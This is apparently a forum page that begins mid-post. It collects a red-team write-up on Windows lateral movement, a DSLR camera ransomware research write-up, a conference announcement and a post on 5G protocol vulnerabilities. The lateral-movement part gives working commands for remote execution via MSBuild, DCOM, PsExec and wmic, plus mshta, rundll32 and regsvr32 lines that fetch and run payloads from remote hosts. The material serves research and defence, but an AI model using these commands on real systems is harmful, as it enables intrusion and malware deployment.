process call create "c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe C:\Windows\Temp\build.xml"

Host the XML via WebDAV (shown further below)

Use PsExec:

psexec \\host.domain -u Domain\Tester -p Passw0rd c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe \\host.domain\C$\Windows\Temp\build.xml

In Cobalt Strike, there's an Aggressor Script extension that uses MSBuild to execute Powershell commands without spawning Powershell, by being an unmanaged process (a binary compiled straight to machine code). It uploads via WMI/wmic.exe: https://github.com/Mr-Un1k0d3r/PowerLessShell

The key indicator with MSBuild is that it's executing over SMB and making an outbound connection, with MSBuild.exe calling the 'QueryNetworkOpenInformationFile' operation, which is an IOC.

DCOM

Component Object Model (COM) is a protocol used by processes with different applications and languages so they can communicate with one another. COM objects cannot be used over a network, which is what introduced the Distributed COM (DCOM) protocol. My brilliant co-worker Matt Nelson discovered a lateral movement technique via DCOM, using the ExecuteShellCommand method in the Microsoft Management Console (MMC) 2.0 scripting object model, which is used for System Management Server administrative functions. It can be called via the following:

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.10.30")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")

DCOM uses a network logon (type 3), so the double-hop problem is encountered here as well. PsExec eliminates the double-hop problem because credentials are passed with the command and generate an interactive logon session (type 2). The problem, however, is that the ExecuteShellCommand method only allows four arguments; if anything less than or more than four is passed in, it errors out. Also, spaces have to be their own arguments (e.g.
"cmd.exe",$null,"/c" is three arguments), which eliminates the possibility of using PsExec with DCOM to execute MSBuild. From here, there are a few options:

Use WebDAV
Host the XML file on an SMB share that doesn't require authentication (e.g. using Impacket's smbserver.py, though this most likely requires the attacker to have their attacking machine on the network)
Try other similar 'ExecuteShellCommand' methods

With WebDAV, it still utilizes a UNC path, but Windows will eventually fall back to port 80 if it cannot reach the path over 445 and 139. With WebDAV, SSL is also an option. The only caveat is that WebDAV does not work against servers, as the service does not exist on server OSs by default.

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.10.30")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\192.168.10.131\webdav\build.xml","7")

This gets around the double-hop problem by not requiring any authentication to access the WebDAV server (which in this case is also the C2 server). As shown in the video, the problem with this method is that it spawns two processes: mmc.exe, because of the DCOM method call from MMC 2.0, and MSBuild.exe. In addition, this does write to disk temporarily. WebDAV writes to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV and does not clean up any files after execution. MSBuild temporarily writes to C:\Users\[USER]\AppData\Local\Temp\[RANDOM]\ and does clean up after itself. The neat thing with this trick is that since MSBuild used WebDAV, MSBuild cleans up the files WebDAV created.

Other DCOM execution methods and defensive suggestions are in this article.

Remote File Upload

Not necessarily a lateral movement technique, but it's worth noting that you can spawn your own binary instead of using Cobalt Strike's built-ins, which (could be) more stealthy. This works by having upload privileges over SMB (i.e.
Administrative rights) to the C$ share on the target, to which you can then upload a stageless binary and execute it via wmic or DCOM, as shown below. Notice the beacon doesn't "check in"; it needs to be done manually via the command: link target.domain

Without CS:

copy C:\Windows\Temp\Malice.exe \\target.domain\C$\Windows\Temp
wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\Temp\Malice.exe"

Other Code Execution Options

There are a few more code execution options that are possible which require local execution instead of remote, so like MSBuild, these have to be paired with a lateral movement technique.

Mshta

Mshta.exe is an executable installed by default on Windows that allows the execution of .hta files. .hta files are Microsoft HTML Application files and allow execution of Visual Basic scripts within the HTML application. The good thing about Mshta is that it allows execution via URL, and since it's a trusted Microsoft executable, it should bypass default app-whitelisting.

mshta.exe https://malicious.domain/runme.hta

Rundll32

This one is relatively well known. Rundll32.exe is, again, a trusted Windows binary and is meant to execute DLL files. The DLL can be specified via a UNC WebDAV path or even via JavaScript:

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"

Since it's running DLLs, you can pair it with a few other ones for different techniques:

url.dll: Can run .url (shortcut) files; can also run .hta files

rundll32.exe url.dll,OpenURL "C:\Windows\Temp\test.hta"

ieframe.dll: Can run .url files. Example .url file:

[InternetShortcut]
URL=file:///c:\windows\system32\cmd.exe

shdocvw.dll: Can run .url files as well

Regsvr32

Register Server is used to register and unregister DLLs in the registry. Regsvr32.exe is a signed Microsoft binary and can accept URLs as an argument.
Specifically, it will run a .sct file, which is an XML document that allows registration of COM objects.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Read Casey Smith's writeup for a more in-depth explanation.

Conclusion

Once again, this list is not comprehensive, as there are more techniques out there. This was simply me documenting a few things I didn't know and figuring out how things work under the hood. When learning Cobalt Strike, I learned that the built-ins are not OpSec friendly, which could lead to the operator getting caught, so I figured I'd try to at least document some high-level IOCs. I encourage everyone to view the MITRE ATT&CK Knowledge Base to read up more on lateral movement and potential IOCs. Feel free to reach out to me on Twitter with questions: @haus3c

Published by Hausec, August 12, 2019

Sursa: https://hausec.com/2019/08/12/offensive-lateral-movement/
    2 points
  3. Mayday.conf ( https://www.mayday-conf.com ) is the first international cyber security conference in Cluj-Napoca (October 24-25), and RST is a community partner of the event. The event was born out of a passion for security and aims, first and foremost, to help develop people who are interested in this field. During the event there will be talks on the latest techniques used by pentesters and Incident Responders, as well as topics such as identifying the TTPs used by attackers. Moreover, the event will feature CTFs with prizes, cyber exercises, and workshops. To receive real-time notifications you can subscribe to the newsletter at www.mayday-conf.com, follow the Facebook page ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday ), or join the Slack group ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM ) And now for the surprise... Because "sharing is caring", the organizers are offering RST members 10 access vouchers for both days. These can be obtained by sending a private message to Nytro (including an email address) by September 1st, and the selection will be made according to the following criteria: - number of posts on the forum - number of likes and upvotes received on posts - projects published on the forum - seniority on RST URL: https://www.mayday-conf.com
    1 point
  4. These people didn't just "think outside the box", they thought "outside the solar system"...
    1 point
  5. Synopsis: A simple misconfiguration can lead to Stored XSS. Link: https://medium.com/@nahoragg/chaining-cache-poisoning-to-stored-xss-b910076bda4f
    1 point
  6. Synopsis: In external and red team engagements, we often come across different forms of IP based blocking, used to prevent things like password brute forcing and password spraying: API rate limiting, web application firewalls (WAFs), and similar controls. IP blocking has always been a simple and common way of blocking potentially malicious traffic to a website. The general method of IP based blocking is to monitor for a certain type of request or behavior, and when it is found, disable access for the IP that the request or behavior came from. In this post, we walk through the need for and creation of a Burp Suite extension that we built in order to easily circumvent IP blocking. Source: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
    1 point
  7. Say Cheese: Ransomware-ing a DSLR Camera

August 11, 2019
Research by: Eyal Itkin

TL;DR

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes.

Background:

DSLR cameras aren't your grandparents' cameras, those enormous antique film contraptions you might find up in the attic. Today's cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment.

Our research shows how an attacker in close proximity (WiFi), or an attacker who has already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how you would respond if attackers injected ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay a ransom. Below is a video demonstration of this attack.

Technical Details

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera's firmware.
Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol accessible only to USB-connected devices is now also PTP/IP, accessible to every WiFi-enabled device in close proximity.

In a previous talk named "Paparazzi over IP" (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon's EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target's computer was paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol's functionality to spy on a victim.

In our research, we aim to advance beyond the point of accessing and using the protocol's functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario allows attackers to do whatever they want with the camera, and infecting it with ransomware is only one of many options.

From an attacker's perspective, the PTP layer looks like a great target:

PTP is an unauthenticated protocol that supports dozens of different complex commands.
A vulnerability in PTP can be equally exploited over USB and over WiFi.
The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on PTP as our attack vector, describing two potential avenues for attackers:

USB – For an attacker that took over your PC and now wants to propagate into your camera.
WiFi – An attacker can place a rogue WiFi access point at a tourist attraction to infect your camera.
In both cases, the attackers are going after your camera. If they're successful, the chances are you'll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon's EOS 80D DSLR camera for multiple reasons, including:

Canon is the largest DSLR maker, controlling more than 50% of the market.
The EOS 80D supports both USB and WiFi.
Canon has an extensive "modding" community, called Magic Lantern.

Magic Lantern (ML) is an open-source free software add-on that adds new features to Canon EOS cameras. As a result, the ML community has already studied parts of the firmware and documented some of its APIs.

Attackers are profit-maximisers: they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and is the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of any embedded research. The first step is to check if there is a publicly available firmware update file on the vendor's website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise: the file appears to be encrypted / compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially hint at the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file.
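The byte-histogram intuition above (encrypted or well-compressed data has a near-uniform byte distribution) can be sketched as a Shannon entropy check. This is a minimal illustration, not the tooling used in the research:

```python
import collections
import math
import os

# Shannon entropy in bits per byte: close to 8.0 for random-looking
# (encrypted or well-compressed) data, much lower for plain code and text.
def byte_entropy(data: bytes) -> float:
    counts = collections.Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

print(byte_entropy(os.urandom(1 << 16)))  # near 8.0
print(byte_entropy(b"A" * (1 << 16)))     # 0.0: a constant byte has no entropy
```

A firmware image that scores near 8.0 end-to-end, with no low-entropy region for a bootloader, is exactly the dead end described above.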
Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added key-management costs they imply for the vendor.

Feeling stuck, we went back to Google and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the "update protection" of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirmed our initial guess: the firmware is AES encrypted.

Being open-source, we hoped that ML would have somehow published this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn't even find the key anywhere on the internet. Yet another dead end.

The next thing to check was whether ML had ported their software to our camera model, on the chance it contained debugging functionality that would help us dump the firmware. Although such a port has yet to be released, while reading through their forums and wiki we did find a breakthrough. ML developed something called Portable ROM Dumper: a custom firmware update file that, once loaded, dumps the memory of the camera onto the SD card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera's firmware and loaded it into our disassembler (IDA Pro). Now we could finally start looking for vulnerabilities in the camera.
Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

The PTP layer is command-based, and every command has a unique numeric opcode.
The firmware contains many indicative strings, which eases the task of reverse-engineering it.

Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

Looking at the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them are very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context:

Figure 4 – Decompiled PTP handler, using the ptp_context object.

As we can see, the context contains function pointers that are used for:

Querying the size of the incoming message.
Receiving the incoming message.
Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker's viewpoint, we have full control of this input buffer; therefore, we could start looking for vulnerabilities in this much smaller set of commands.
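As a concrete sketch of what such a command looks like on the wire, a standard PTP command container is a little-endian structure: a u32 total length, a u16 container type (1 for a command block), the u16 opcode, a u32 transaction ID, and up to five u32 parameters. This is generic PTP framing, not code from the research:

```python
import struct

PTP_CONTAINER_COMMAND = 1  # container type for a command block

def ptp_command(opcode: int, transaction_id: int, params=()) -> bytes:
    # the protocol caps commands at five numeric parameters
    assert len(params) <= 5
    body = struct.pack("<HHI", PTP_CONTAINER_COMMAND, opcode, transaction_id)
    body += b"".join(struct.pack("<I", p) for p in params)
    # the total-length field counts itself (4 bytes) plus the body
    return struct.pack("<I", 4 + len(body)) + body

pkt = ptp_command(0x100C, 1, (0,))  # e.g. SendObjectInfo with one parameter
```

Probing the 38 buffer-receiving handlers then amounts to following such a command with an attacker-controlled data-phase container.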
Luckily for us, the parsing code for each command uses plain C code and is quite straightforward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100C

Internally, the protocol refers to supported files and images as "Objects", and in this command the user updates the metadata of a given object. The handler contains a buffer overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a buffer overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive located right after our copy: our copy can modify the pKeywordsStringUnicode field into an arbitrary value and later trigger a call to free it. This looked like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn't support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic stack-based buffer overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we were pretty close to the end of the handler's list, we decided to finish going over the rest.
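A stack-based overflow like the NotifyBtStatus one is typically triggered by an oversized data phase. The payload shape below is purely illustrative: the real buffer size, stack-frame layout, and return-address offset on the camera are assumptions, not values from the research.

```python
# Illustrative only: fill a fixed-size stack buffer, then overwrite the
# (assumed) saved return address with an attacker-chosen 32-bit value.
def overflow_payload(buf_size: int, ret_addr: int, filler: bytes = b"A") -> bytes:
    payload = filler * buf_size                # fill the local buffer
    payload += ret_addr.to_bytes(4, "little")  # clobber saved return (ARM is LE)
    return payload

poc = overflow_payload(0x100, 0xDEADBEEF)  # size and address are placeholders
```

In practice the saved registers between the buffer and the return address also get clobbered, so a working payload pads those slots too.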
CVE-2019-5999 – Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a heap-based buffer overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

Buffer overflow over a global structure.
Buffer overflow over the stack.
Buffer overflow over the heap.

As mentioned previously, we attempted to exploit the stack-based vulnerability, which would hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon's "EOS Utility" software, and it seemed natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn't work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that triggers each of the vulnerabilities we found, hopefully ending with the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as "Err 70."

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we were sure all of our vulnerabilities indeed work, it was time to start the real exploit development. A basic recap of our tools thus far:

Our camera has no debugger or ML on it.
The camera hasn't been opened yet, meaning we don't have any hardware-based debugging interface.
We don't know anything about the address space of the firmware, except the code addresses we see in our disassembler.

The bottom line: we are connected to the camera using a USB cable, and we want to blindly exploit a stack-based buffer overflow. Let's get started.
Our plan was to use the Sleep() function as a breakpoint, and test if we could see the device crash after a given number of seconds. This would confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans: most of the time, the vulnerable task simply died without triggering a crash, causing the camera to hang. Needless to say, we can't differentiate between a hang, and a sleep followed by a hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow had reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From then on, our breakpoint was a call to that address: a crash means we hit our breakpoint, and "nothing" (a hang) means we didn't reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now had code execution.

Loading Scout

Scout is my go-to debugger. It is an instruction-based debugger that I developed during the FAX research, and it proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we could use a file loader that loads Scout from the SD card, we would later need the same network connectivity for Scout anyway, so we might as well solve this issue now for both.

After playing with the different settings in the camera, we realized that the WiFi can't be used while the USB is connected, most likely because both are meant to be used by the PTP layer, and there is no support for using them at the same time. So we decided the time had come to move on from USB to WiFi.

We can't say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke.
After intensive examination, our best guess is that the camera crashes before we return from the vulnerable function, effectively blocking the stack-based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera, especially when it doesn't even support Bluetooth.

We went back to the drawing board. We could try to exploit one of the other two vulnerabilities; however, one of them is also in the Bluetooth module, and it didn't look promising. Instead, we went over the list of PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000 – Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler.

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial: illegal packets are only logged, not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn't an assert, and it won't stop our stack-based buffer overflow 😊

Although this vulnerability is exactly what we were looking for, we once again decided to keep looking for more, especially as this kind of vulnerability would most likely be found in more than a single command.

CVE-2019-6001 – Buffer Overflow in SendAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, it was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.
Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we continued using the previous vulnerability.

Side note: when testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns; we were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout onto the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But wait a minute, aren't we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it's time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looked like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better than we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting a malicious firmware update and then signing it so it passes the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated.
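Why a symmetric scheme hands attackers a signing primitive can be shown with a toy construction. This is NOT Canon's actual algorithm; it only illustrates that whoever holds the verification key can also forge:

```python
import hashlib

KEY = b"key-recoverable-from-firmware"  # hypothetical shared secret

# Toy symmetric integrity scheme: tag = SHA-256(key || data).
def sign(data: bytes) -> bytes:
    return hashlib.sha256(KEY + data).digest()

def verify(data: bytes, tag: bytes) -> bool:
    return sign(data) == tag

# The device needs KEY to verify updates; an attacker who extracts KEY
# from a firmware dump can therefore sign arbitrary updates.
forged = b"malicious firmware image"
assert verify(forged, sign(forged))
```

An asymmetric scheme (verify on-device with a public key, sign with a private key kept off-device) would not have this property.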
Using this instruction, we now know the correct signatures for each part of the firmware update file, effectively gaining a signing primitive from the camera itself. Since we only have one camera, this was a tricky part: we wanted to test our own custom home-made firmware update file, but we didn't want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM dumper, created by patching Magic Lantern's ROM dumper. Figure 11 – Image of our customized ROM Dumper, using our header. CVE-2019-5995 – Silent malicious firmware update: There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file. Wrapping it up After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD card, the ransomware displays the ransom message to the user. Chaining everything together requires the attacker to first set up a rogue WiFi access point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect to. Once the attacker is within the same LAN as the camera, he can initiate the exploit. Here is a video presentation of our exploit and ransomware. Disclosure Timeline 31 March 2019 – Vulnerabilities were reported to Canon. 14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities. 08 July 2019 – We verified and approved Canon's patch. 06 August 2019 – Canon published the patch as part of an official security advisory.
Canon's Security Advisory Here are the links to the official security advisory that was published by Canon: Japanese: https://global.canon/ja/support/security/d-camera.html English: https://global.canon/en/support/security/d-camera.html We strongly recommend that everyone patch their affected cameras. Conclusion During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well. Our research shows that any "smart" device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and widespread consumer audience makes cameras a lucrative target for attackers. A final note about the firmware encryption: using Magic Lantern's ROM dumper, and later the functions from the firmware itself, we were able to bypass both the encryption and the verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers. Source: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
  8. New vulnerabilities in 5G Security Architecture & Countermeasures (Part 1) Written 8 August 2019 by Ravishankar Borgaonkar The 5G network promises to transform industries and our digital society by providing enhanced capacity, higher data rates, increased battery life for machine-type devices, higher availability and reduced power consumption. In a way, 5G will act as a vehicle to drive the much-needed digital transformation and will push the world into the information age. Also, 5G can be used to replace the existing emergency communication network infrastructures. Many countries are about to launch 5G services commercially, as 5G standards, including security procedures, have been developed by the 3GPP group. The map in Figure 1 shows 5G deployments worldwide. Figure 1: 5G deployments worldwide [1] With every generation from 2G to 5G, wireless security (over-the-air security between mobile phones and cellular towers) has been improving to address various threats. For example, 5G introduced additional security measures to counteract fake base station types of attacks (also known as IMSI catchers or Stingrays). Thus, the privacy of mobile subscribers while using 5G networks is much better than in previous generations. However, some of the wireless functionalities that existed in 4G are re-used in 5G. For example, the 3GPP standards group has designed several capabilities in the 4G and 5G specifications to support a wide range of applications including smart homes, critical infrastructure, industrial processes, HD media delivery, automated cars, etc. In simple words, such capabilities mean telling the cellular network "I am a mobile phone, a car, or an IoT device" in order to receive special network services. These capabilities play an essential role in the right operation of the device with respect to its application.
In particular, they define the speed, frequency bands, security parameters, and application-specific parameters such as the telephony capabilities of the device. This allows the network to recognise the application type and accordingly offer the appropriate service. For example, an automated car indicates its Vehicle-2-Vehicle (V2V) support to the network and receives the required parameters to establish communication with surrounding vehicles. Over the last several months Dr. Ravishankar Borgaonkar together with Altaf Shaik, Shinjo Park and Prof. Jean-Pierre Seifert (SecT, TU Berlin, Germany) experimented with 5G and 4G device capabilities, both in a laboratory setting and in real networks. This joint study uncovers the following vulnerabilities: Vulnerabilities in 5G A protocol vulnerability in the 4G and 5G specifications TS 33.401 [2] and TS 33.501 [3] that allows a fake base station to steal information about the device and mount identification attacks Implementation vulnerability in cellular network operator equipment that can be exploited during the device registration phase A protocol vulnerability in the first release of LTE NB-IoT that affects the battery life of low-powered devices Potential Attacks An adversary can mount active or passive attacks by exploiting the above three vulnerabilities. In active attacks, he or she can act as a man-in-the-middle attacker to alter device capabilities. Another important point is that such attacks can be carried out using a low-cost hardware/software setup. As shown in Figure 2, we use an approximately 2000 USD setup to demonstrate attack feasibility and subsequent impacts. Figure 2: Experimental setup for MiTM attack [4] In particular, we demonstrated the following man-in-the-middle (MiTM) attacks – Fingerprinting Attacks – An active adversary can intercept device capabilities, identify the type of devices on a mobile network, and infer the underlying applications.
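The fingerprinting idea reduces to matching an intercepted capability set against known device profiles. A minimal sketch of that classification step (capability names and the profile table are my own illustrations, not taken from the paper):

```python
# Sketch of device fingerprinting from intercepted capability lists
# (the MNmap idea). The capability names and the mapping are illustrative.
CAPABILITY_FINGERPRINTS = {
    frozenset({"volte", "nr-dual-connectivity", "4rx-antennas"}): "smartphone",
    frozenset({"v2v-sidelink"}): "vehicle",
    frozenset({"nb-iot", "psm"}): "iot-sensor",
}

def classify(capabilities: set) -> str:
    # A device matches a profile if it advertises all of that profile's
    # characteristic capabilities.
    for fingerprint, device_type in CAPABILITY_FINGERPRINTS.items():
        if fingerprint <= capabilities:
            return device_type
    return "unknown"

print(classify({"nb-iot", "psm", "low-power"}))  # iot-sensor
print(classify({"v2v-sidelink", "volte"}))       # vehicle
```

Because the capability exchange happens before security is established, a passive sniffer sees exactly the input this classifier needs.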
To demonstrate the impact, we performed a Mobile Network Mapping (MNmap) attack which results in the device type identification levels shown in Figure 3. Downgrading Attacks – An active adversary can also alter radio capabilities to downgrade network services. For example, VoLTE calls can be denied to a particular mobile phone during the attack. Battery Drain Attacks – Starting from 4G networks, there is a Power Saving Mode (PSM) defined in the specifications. All cellular devices can request the use of PSM by including a timer T3324 during the registration procedure. When PSM is in use, the 3GPP standard indicates to turn off the radio baseband of the device and thus the radio operations; however, applications on the device (or sensors) can still operate depending on the device settings. An adversary can remove the use of the PSM feature from the device capability list during the registration phase, resulting in loss of battery power. In our experiment with an NB-IoT device, a power drain attack reduces the battery life by a factor of 5. Figure 3: Device type identification levels [4] More detailed information about the above attacks, their feasibility and their impact can be found in our full paper, titled “New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities” [4]. Responsible Disclosure We discovered the vulnerabilities and attacks earlier this year. We followed a responsible disclosure procedure and notified GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme. In parallel, we also notified 3GPP, which is responsible for designing the 4G/5G security specifications, and the affected mobile network operators. Research Impact & Countermeasures We suggested in [4] that 3GPP should consider mandating security protection for device capabilities.
In particular, the Device Capability Enquiry message carrying radio access capabilities should be accessible/requested by the eNodeB (a base station in 4G or 5G, for example) only after establishing RRC security. This will prevent a MiTM attacker from hijacking those capabilities. Consequently, fixing these vulnerabilities will help in mitigating IMSI catcher or fake base station types of attacks against 5G networks. On the network operator side, the eNodeB configuration or implementation should be changed such that an eNodeB requests Device Capability Information only after establishing a radio security association. This is a relatively easy fix and can be implemented by the operators either as a software update or as a configuration change on their eNodeBs. Nevertheless, in practice, only a minority of operators acquire capabilities after security setup. The difference among the various operators we tested clearly indicates that this could be either an implementation or a configuration problem. While working with GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme, we received confirmation (with number CVD-2019-0018) last week during the Device Security Group meeting in San Francisco that 3GPP SA3, the group that standardizes 5G security, has agreed to fix the vulnerabilities identified by us in [4]. The following is a snapshot of the countermeasures to be added to the 4G [2] and 5G [3] specifications respectively – 3GPP SA3 response to fix specification vulnerabilities Even though the fixes will be implemented in the 4G and 5G standards in the coming months, baseband vendors need longer periods (as compared with normal Android or iOS software updates) to update their basebands, and hence attackers can still exploit this vulnerability against 4G and 5G devices. A summary of our findings, the potential attacks, 